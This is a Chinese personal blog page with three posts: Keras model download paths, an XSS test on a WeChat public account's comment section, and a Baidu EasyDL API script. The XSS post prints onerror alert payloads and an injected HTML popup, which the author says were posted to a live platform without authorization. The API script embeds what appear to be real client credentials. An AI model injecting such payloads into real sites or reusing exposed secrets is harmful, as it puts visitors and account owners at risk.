image frame

果果的博客

keras预训练模型手动下载

复现一下kaggle的题目,使用keras的预训练模型,但是自动下载始终会出问题,决定手动下载

讲道理我电脑上用的是annoconda,但是吧模型放到annconda的keras目录地下死活不行,后来放到了win user底下里面才行。

C:\Users\user\.keras\models

读芯术平台XSS

闲的没事干去读芯术的微信公众号学习AI,发现评论区没有任何的过滤,而且电脑端右键可以查看源码

但是评论区的内容并没有执行的迹象,所以能否成功还不确定。

一开始使用最普通的 alert

1
2
<video src=test.mp4 onerror=alert(‘1’);>//视频
<audio src=test.mp3 onerror=alert(‘1’);>//音乐

发现不行,但是出现了图片的样式

这就说明了可以利用!!

从前端随便摘抄了一段现有的弹窗代码

1
2
3
4
5
6
7
8
9
10
<div class="chuangti">
	<div class="top"><span>自动化73班的果果帅不帅</span></div>
	<dl class="neirong">
		<dt>
			<a class="quxiao anniu_lan" href="JavaScript:;" onclick="xptc_guanbi();">很帅</a>
			<a class="quxiao anniu_lan" href="JavaScript:;" onclick="xptc_ok();">最帅</a>
		</dt>
		
	</dl>
</div>

执行成功


可惜的是本来可以更多的利用的,但是由于之前没有做过微信小程序的相关漏洞,也没做过微信小程序的抓包工作,没有做后续的信息收集和更深层的渗透,就暂且弄一个弹窗罢。考研要紧,考研要紧。

结尾

存储型xss漏洞很危险,每次点击和浏览网页的人都要承担该漏洞的风险,传播起来十分恐怖,但是平台的联系方式始终联系不上,给老师说老师也不鸟我。

祈祷平安。

嫖百度的easyDL

百度的ezdl实验,进去玩玩,希望能学到点东西,用群里的数据,用百度的公有云,白嫖快乐。
接口调用的代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# -*- coding: UTF-8 -*-
import requests
import base64,json,cv2
file_path = 'test.jpg'#这里输入图片的地址即可
access_token = ''
host = 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id=szbFpD6Kkuv6Edgwsq4SpNn8&client_secret=Gqlr50aK8hgyZo6rGiL3nviyQrjBVV2M&'
response = requests.get(host)
if(response):
	con = response.json()
	access_token = con['access_token']

def get_file_content(file_path):
	with open(file_path, 'rb') as fb:
		return fb.read()
if access_token != '':
	image = get_file_content(file_path)
	image_base64 = base64.b64encode(image)
	image_base64_utf8 = str(image_base64, encoding = 'utf-8')
	request_url = "https://aip.baidubce.com/rpc/2.0/ai_custom/v1/detection/galaxy_rubbish"

	request_url += "?access_token=" + access_token
	s = json.dumps({'image':image_base64_utf8})
	response = requests.post(request_url, data = s, headers = {'Content-Type':'application/json'})
	content = response.json()
	results = content['results']
	print(results)
	image = cv2.imread(file_path)
	cv2.namedWindow("capture",0)
	cv2.resizeWindow("capture", 1200,1200)
	font = cv2.FONT_HERSHEY_SIMPLEX
	for con in results:
		x1 = con['location']['left']
		x2 = x1+con['location']['width']
		y1 = con['location']['top']
		y2 = y1+con['location']['height']
		image = cv2.rectangle(image,(x1,y1),(x2,y2),(0,255,0),5)
		image = cv2.putText(image,con['name']+str(con['score'])[:6],(x1,y2+20),font,1.2,(255,255,255),2)
	cv2.imshow("capture", image)
	cv2.waitKey(0)

  • Copyrights © 2015-2024 galaxy
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信